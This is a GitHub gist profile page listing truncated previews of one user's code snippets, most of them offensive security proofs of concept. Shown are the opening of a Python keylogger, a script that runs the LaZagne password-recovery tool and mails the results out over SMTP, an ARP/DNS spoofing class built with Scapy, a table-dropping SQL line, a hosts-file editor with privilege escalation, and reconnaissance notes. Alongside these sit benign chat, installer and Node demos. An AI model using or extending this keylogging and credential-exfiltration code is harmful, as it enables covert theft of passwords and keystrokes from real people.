Skip to content

Instantly share code, notes, and snippets.

View davidlares's full-sized avatar
🎯
Focusing

David E Lares S davidlares

🎯
Focusing
View GitHub Profile
@davidlares
davidlares / exec.sql
Last active August 31, 2023 02:27
PoC of Powershell and Batch (.bat) scripts for A2 softway (SQLserver 64-bit) [Untested]
DROP TABLE [dbo].[Sinventario];
@davidlares
davidlares / keylogs.py
Last active September 11, 2023 17:58
An outdated python Keylogger
from pynput import keyboard
import threading
import smtplib
class KeyLogger:
def __init__(self, time_interval, email, username, password):
self.log = "KeyLogger started"
self.interval = time_interval
self.username = username
@davidlares
davidlares / password.py
Created February 2, 2023 00:20
Running LaZagne programatically /w Python
import subprocess, smtplib, os, tempfile, requests
def send_email(email, username, password, message):
# instance
server = smtplib.SMTP("smtp.mailtrap.io", 587)
server.starttls()
server.login(username, password) # login
server.sendmail(email, email, message) # sending message
server.quit()
@davidlares
davidlares / Client.java
Created February 1, 2023 23:02
Java multi-client chat PoC (from youtube video)
import java.util.Scanner;
import java.net.Socket;
import java.io.*;
public class Client {
// elements
private Socket socket;
private BufferedReader bufferedReader;
private BufferedWriter bufferedWriter;
private String username;
@davidlares
davidlares / node-msi.iss
Last active August 7, 2022 05:01
Node's MSI binary install function for Inno Setup
[Code]
procedure RunNodeInstaller;
var
ErrorCode: Integer;
begin
if not ShellExec('', 'msiexec.exe', ExpandConstant('/i "{app}\{#NodeInstaller}" /qb'), '', SW_SHOWNORMAL, ewWaitUntilTerminated, ErrorCode) then
begin
MsgBox(IntToStr(ErrorCode), mbError, MB_OK);
end;
end;
@davidlares
davidlares / dns.md
Last active July 28, 2022 05:08
Powershell script for editing local DNS (hosts file) on Windows (contain priv. escalation)

File: setup.ps1

(Scaling privileges and local DNS edit)

This script is adapted to perform a privilege escalation and a custom edition of the local DNS hosts file on Windows machines, located in the C:\Windows\system32\drivers\etc\ directory.

Execution

  1. Changing the default's Restricted ExecutionPolicy to Bypass for the CurrentUser Scope.
@davidlares
davidlares / index.js
Last active July 26, 2022 17:34
NodeJS' child_process (fork & exec) functions PoC
const {fork} = require('child_process')
const path = require('path')
let cmd = fork(path.join(__dirname, 'run.js'), [], {cwd: process.cwd(), stdio: ['pipe', 'ipc']})
// sending
cmd.send('david')
// receiving
cmd.on('message', (data) => {
console.log(data) // Hello david
})
@davidlares
davidlares / arp.py
Last active July 22, 2024 09:24
MITM ARP/DNS Spoof with Scapy
#!/usr/bin/python
from scapy.all import *
import threading
import argparse
import pdb
import sys
import os
class ARPPoisoning(threading.Thread):
@davidlares
davidlares / smtp-enumeration.md
Created July 19, 2021 03:40
SMTP Enumeration script

SMTP Enumeration

SMTP is a text protocol used to send emails, it allows you to send commands so a server can understand.

it uses port 25 and certainly, it does not support packet encryption when exchanging.

There's also a bunch of commands that are used in a restrictive mode, it can expose sensitive data.

Example:

@davidlares
davidlares / ping-scan.md
Last active July 19, 2021 17:24
Network recon with ping (Ping scan)

Ping Scan (Network sniffer)

This is a PoC script to find active machines in a port range with Python.

The whole idea is to use the ICMP protocol and check the ECHO_REPLY state, if it's found, it will "reply" with a string that starts with "bytes from: "

The ICMP protocols works on the link layer, however, it can be used in the application layer as well.

The 'Subprocess' module is required to run the /bin/ping -c 1 commands directly from Python, and for redirecting data output, error and input to the programming logic inside.